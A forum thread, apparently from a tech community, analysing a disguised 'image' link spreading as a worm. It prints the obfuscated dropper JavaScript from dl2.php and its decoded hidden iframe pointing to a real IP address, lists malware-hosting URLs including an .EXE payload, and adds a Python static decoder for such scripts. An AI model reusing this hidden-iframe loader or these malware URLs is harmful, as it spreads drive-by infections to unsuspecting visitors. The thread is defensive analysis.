Website not block?


Rainbow1112

The image contains the following, showing it's not actually an image;

<frameset rows=170,* border=0><frame name=top src=dl.php?i= noresize border=0><frame name=main src=dl2.php noresize border=0><frame name=main2 src=dl3.php noresize border=0></frameset>

dl.php leads to a file called codec.jpg, which, yep, you've guessed, isn't an image (haven't checked the file itself yet, but initial inspection shows it's likely an exploit).

dl2.php contains;

var hzhmJvuTddki4h9S1V2lWN = '%3C%69%66';var nt4ha1a6tF9xId7KF4JrYcnlL6H55 = '%72';var eLs3w37pxu = '%61%6D%65%20%6E%61%6D%65%3D%22';var woBcX46Ly93iN9GNqp6DPmH7kcjaf3 = '%75%34%49%68%53%47%67%67%63%74%33%33%34%65%33%67%63%47%51%78%43%70%46%41%69';var il3eaHJqew4PQ5pfyzeVkHl3 = '%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%30%22';var neq7X = '%73%72%63%3D%22';var ylxQinb2no1necna25017K830un9 = '%68%74%74%70%3A%2F%2F';var o411mcr = '66.225.219.106/images/banner.php';var hK7Rhc6ZpVwlsf0262Vr6f5mlMk4935r8 = '%22%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%22%31%22%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%22%30%22%20%74%69%74%6C%65%3D%22';var zsv8o = '%75%36%48%41%56';var jOL69u4a5510Dizgej = '%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%62%6F%72%64%65%72%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E';var rqrsp56oHj = '%3C%69%66';var ryuO29Suj9dyfdpd6817RZBX4wJy3Az9i = '%72%61';var mHhUvkloet4YxI = '%6D%65%3E';var llk96Fte6nyMphufq7xTJ8Q3f29oS=new Array();llk96Fte6nyMphufq7xTJ8Q3f29oS[0]=new Array(hzhmJvuTddki4h9S1V2lWN+nt4ha1a6tF9xId7KF4JrYcnlL6H55+eLs3w37pxu+woBcX46Ly93iN9GNqp6DPmH7kcjaf3+il3eaHJqew4PQ5pfyzeVkHl3+neq7X+ylxQinb2no1necna25017K830un9+o411mcr+hK7Rhc6ZpVwlsf0262Vr6f5mlMk4935r8+zsv8o+jOL69u4a5510Dizgej+rqrsp56oHj+ryuO29Suj9dyfdpd6817RZBX4wJy3Az9i+mHhUvkloet4YxI);srAGioVkn2Zzu1n0PV3=unescape(llk96Fte6nyMphufq7xTJ8Q3f29oS);document.write(srAGioVkn2Zzu1n0PV3);

Which decodes to;

<iframe name="u4IhSGggct334e3gcGQxCpFAi" width="1" height="0"src="http://66.225.219.106/images/banner.php" marginwidth="1" marginheight="0" title="u6HAV" scrolling="no" border="0" frameborder="0"><iframe>

banner.php isn't returning any actual content for me at present.

dl3.php contains the executable itself, as referenced by Falkra

/edit

For ease, the following is the list of URLs;

http://66.225.219.106/images/banner.php
http://img194.imagshack.net/img194/1362/DSC0020090829.JPG/dl3.php
http://img194.imagshack.net/img194/1362/DSC0020090829.JPG/dl2.php
http://img194.imagshack.net/img194/1362/DSC0020090829.JPG/dl.php?i=
http://img194.imagshack.net/img194/1362/DSC0020090829.JPG/codec.jpg
http://img194.imagshack.net/img194/1362/DSC0020090829.JPG/IMG000020096253-BMP.EXE

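The decoding step described in the post above can be done statically, without loading the script in a browser. The following is an added example, not part of the original thread: it rebuilds the string such a script hands to document.write() and lists any frame it would inject. The sample script is constructed (shortened variable names, placeholder host), and `static_decode` and `find_frames` are hypothetical helper names.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample in the style of dl2.php: short names, placeholder host.
SAMPLE = (
    "var a1 = '%3C%69%66';var b2 = '%72';var c3 = '%61%6D%65%20';"
    "var d4 = '%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%30%22%20';"
    "var e5 = '%73%72%63%3D%22%68%74%74%70%3A%2F%2F';"
    "var f6 = 'host.example.invalid/images/banner.php';var g7 = '%22%3E';"
    "var arr=new Array();arr[0]=new Array(a1+b2+c3+d4+e5+f6+g7);"
    "out=unescape(arr);document.write(out);"
)

ASSIGN = re.compile(r"var\s+(\w+)\s*=\s*'([^']*)'")
CONCAT = re.compile(r"new Array\(\s*(\w+(?:\s*\+\s*\w+)+)\s*\)")

def static_decode(script):
    """Rebuild the string passed to document.write() without running the script."""
    strings = dict(ASSIGN.findall(script))
    match = CONCAT.search(script)
    if match is None:
        return ""
    parts = [strings.get(name.strip(), "") for name in match.group(1).split("+")]
    # unescape() maps %XX to Latin-1 code points; %uXXXX is not handled here.
    return unquote("".join(parts), encoding="latin-1")

class FrameFinder(HTMLParser):
    """Collect frame/iframe targets and flag ones sized to be invisible."""
    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "frame"):
            a = dict(attrs)
            tiny = any((a.get(k) or "").strip() in ("0", "1") for k in ("width", "height"))
            self.frames.append({"src": a.get("src"), "hidden": tiny})

def find_frames(html):
    finder = FrameFinder()
    finder.feed(html)
    return finder.frames

if __name__ == "__main__":
    print(find_frames(static_decode(SAMPLE)))
```

The regular expressions only cover this one layout (single-quoted string variables concatenated inside `new Array(...)`); a script that builds its payload differently decodes to an empty string rather than a partial result.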

  • Staff
Guys, I think I know the guy who made this worm. Can I post the name and information on how I figured it out?
No, please do not. Feel free to send it to me via PM, though.